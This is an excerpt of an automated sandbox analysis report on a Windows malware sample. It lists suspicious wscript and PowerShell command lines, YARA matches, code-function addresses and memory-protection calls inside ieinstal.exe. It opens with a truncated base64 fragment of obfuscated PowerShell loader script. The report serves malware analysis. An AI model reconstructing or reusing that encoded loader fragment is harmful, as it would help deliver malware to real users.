AawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg	Jump to behavior

Very long command line found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7304
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7324
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7324
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7304	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7324	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7324	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 2072, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 7972, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_04899028	3_2_04899028
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_04898FC0	3_2_04898FC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0489E829	3_2_0489E829
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0489E838	3_2_0489E838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_04899018	3_2_04899018
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08264A90	3_2_08264A90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08261CC7	3_2_08261CC7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08263050	3_2_08263050
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_082646A0	3_2_082646A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_082646A0	3_2_082646A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08262CF8	3_2_08262CF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0826EF20	3_2_0826EF20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0826EF12	3_2_0826EF12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_082690C8	3_2_082690C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0826D188	3_2_0826D188
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0826EF20	3_2_0826EF20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_083C7310	3_2_083C7310
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_083C001E	3_2_083C001E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_083C0040	3_2_083C0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_083C7300	3_2_083C7300
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08421820	3_2_08421820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_084237E3	3_2_084237E3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_084237F0	3_2_084237F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08480448	3_2_08480448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08498E68	3_2_08498E68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0849248C	3_2_0849248C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0849A5F1	3_2_0849A5F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_082690B8	3_2_082690B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04D1AA58	9_2_04D1AA58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04D1EAF0	9_2_04D1EAF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04D1EAE0	9_2_04D1EAE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04D1AA38	9_2_04D1AA38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07B93618	9_2_07B93618
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07B90448	9_2_07B90448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07B9E860	9_2_07B9E860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07B90439	9_2_07B90439
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07B96F73	9_2_07B96F73
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07B96EE8	9_2_07B96EE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07B9E860	9_2_07B9E860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08152E11	9_2_08152E11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08153210	9_2_08153210
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081517B2	9_2_081517B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08157A28	9_2_08157A28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08152E11	9_2_08152E11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081513A2	9_2_081513A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081C2E5A	9_2_081C2E5A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081C1F28	9_2_081C1F28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081C1480	9_2_081C1480
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081C4BF0	9_2_081C4BF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081C4BE9	9_2_081C4BE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081C1F18	9_2_081C1F18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08298C32	9_2_08298C32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08298C40	9_2_08298C40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08290024	9_2_08290024
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08290040	9_2_08290040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0898AA08	9_2_0898AA08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08988F48	9_2_08988F48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0898EF40	9_2_0898EF40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0898E840	9_2_0898E840
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08985B60	9_2_08985B60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089837BA	9_2_089837BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089837C0	9_2_089837C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A2B50	9_2_089A2B50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A2C48	9_2_089A2C48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089BD380	9_2_089BD380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089B23C8	9_2_089B23C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089B9480	9_2_089B9480
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089B9CA8	9_2_089B9CA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089B7C58	9_2_089B7C58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089BCDF8	9_2_089BCDF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089BA528	9_2_089BA528
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089BC680	9_2_089BC680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089BB600	9_2_089BB600
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089B8E78	9_2_089B8E78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089DECA8	9_2_089DECA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089D0820	9_2_089D0820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089D0040	9_2_089D0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089DAEE0	9_2_089DAEE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089DF7A0	9_2_089DF7A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089FEBD0	9_2_089FEBD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089FA3A8	9_2_089FA3A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089FD0A8	9_2_089FD0A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089F0040	9_2_089F0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08157A1A	9_2_08157A1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089AD5A1	9_2_089AD5A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_049C8FF8	13_2_049C8FF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_049C8FEB	13_2_049C8FEB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_049CE890	13_2_049CE890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_049CE8C0	13_2_049CE8C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07EDBEE0	13_2_07EDBEE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07EDBEF0	13_2_07EDBEF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07ED9A38	13_2_07ED9A38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07ED8828	13_2_07ED8828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07FA6390	13_2_07FA6390
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07FA1F00	13_2_07FA1F00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07FA6381	13_2_07FA6381
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07FA1EF0	13_2_07FA1EF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08058C18	13_2_08058C18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08058C40	13_2_08058C40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08050006	13_2_08050006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08050040	13_2_08050040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080E8E48	13_2_080E8E48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080EEE40	13_2_080EEE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080E5A60	13_2_080E5A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080E3671	13_2_080E3671
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_080E36C0	13_2_080E36C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08133840	13_2_08133840
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08133868	13_2_08133868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0814CE63	13_2_0814CE63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0814EFA8	13_2_0814EFA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0814E43A	13_2_0814E43A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0814EF9C	13_2_0814EF9C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08149610	13_2_08149610
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_081589A0	13_2_081589A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0815D270	13_2_0815D270
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08153CB8	13_2_08153CB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0815C998	13_2_0815C998
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0815A208	13_2_0815A208
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0815F7E0	13_2_0815F7E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08760C20	13_2_08760C20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08760040	13_2_08760040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0879BC40	13_2_0879BC40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0879BC30	13_2_0879BC30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08793460	13_2_08793460
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_087AE128	13_2_087AE128
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_087A3980	13_2_087A3980
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_087AB268	13_2_087AB268
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_087A9218	13_2_087A9218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_087ABAE8	13_2_087ABAE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_087A0081	13_2_087A0081
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_04799008	14_2_04799008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_04798FF9	14_2_04798FF9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_04798FC0	14_2_04798FC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0479E950	14_2_0479E950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_081B8C30	14_2_081B8C30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_081B8C22	14_2_081B8C22
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_081B0015	14_2_081B0015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_081B0006	14_2_081B0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_081B0040	14_2_081B0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08273478	14_2_08273478
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08273488	14_2_08273488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0862F830	14_2_0862F830
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0862C9C0	14_2_0862C9C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0862C9C8	14_2_0862C9C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0862EB08	14_2_0862EB08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086959E8	14_2_086959E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08690006	14_2_08690006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0869EB60	14_2_0869EB60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086933C8	14_2_086933C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086933D8	14_2_086933D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0869CC40	14_2_0869CC40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086F8950	14_2_086F8950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086F7408	14_2_086F7408
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086F94A0	14_2_086F94A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086F2E08	14_2_086F2E08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086F5260	14_2_086F5260
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086FF2A0	14_2_086FF2A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086FC3E8	14_2_086FC3E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_086FACA8	14_2_086FACA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08700BD0	14_2_08700BD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08700040	14_2_08700040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08794C98	14_2_08794C98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08790040	14_2_08790040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087938F8	14_2_087938F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08792A09	14_2_08792A09
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08793318	14_2_08793318
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087DF220	14_2_087DF220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087DC2E8	14_2_087DC2E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087D4B68	14_2_087D4B68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087DDCE0	14_2_087DDCE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087D5C88	14_2_087D5C88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087DE560	14_2_087DE560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087DCE28	14_2_087DCE28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087D8768	14_2_087D8768
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087DAF28	14_2_087DAF28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087D77D8	14_2_087D77D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087F43F0	14_2_087F43F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087FECB0	14_2_087FECB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087FECB0	14_2_087FECB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087F1A28	14_2_087F1A28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087F3AE8	14_2_087F3AE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0880FABB	14_2_0880FABB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0880C6E0	14_2_0880C6E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0880B5E8	14_2_0880B5E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08810040	14_2_08810040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_088100F0	14_2_088100F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_08811060	14_2_08811060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_088131B1	14_2_088131B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_088131C0	14_2_088131C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_088131C0	14_2_088131C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_0896F0C8	14_2_0896F0C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_087D0081	14_2_087D0081
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D28AC7	19_2_02D28AC7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D24E8A	19_2_02D24E8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D254C2	19_2_02D254C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D250F3	19_2_02D250F3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D2086B	19_2_02D2086B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D2A216	19_2_02D2A216
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D24B78	19_2_02D24B78
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D2A368	19_2_02D2A368
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D2473C	19_2_02D2473C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_03004E8A	20_2_03004E8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_03008AC7	20_2_03008AC7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_0300473C	20_2_0300473C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_0300A368	20_2_0300A368
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_03004B78	20_2_03004B78
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_0300A216	20_2_0300A216
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_0300086B	20_2_0300086B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_030054C2	20_2_030054C2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_030050F3	20_2_030050F3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: String function: 087D28A0 appears 40 times

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 7_2_00B8BB70 NtProtectVirtualMemory,	7_2_00B8BB70
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 7_2_00B8BAE2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	7_2_00B8BAE2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 7_2_00B8BB69 NtProtectVirtualMemory,	7_2_00B8BB69
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D23CF4 NtSetInformationProcess,	19_2_02D23CF4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D24E8A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,	19_2_02D24E8A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D2AD58 NtProtectVirtualMemory,	19_2_02D2AD58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 19_2_02D24E83 NtProtectVirtualMemory,	19_2_02D24E83
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 20_2_0300AD58 NtProtectVirtualMemory,	20_2_0300AD58
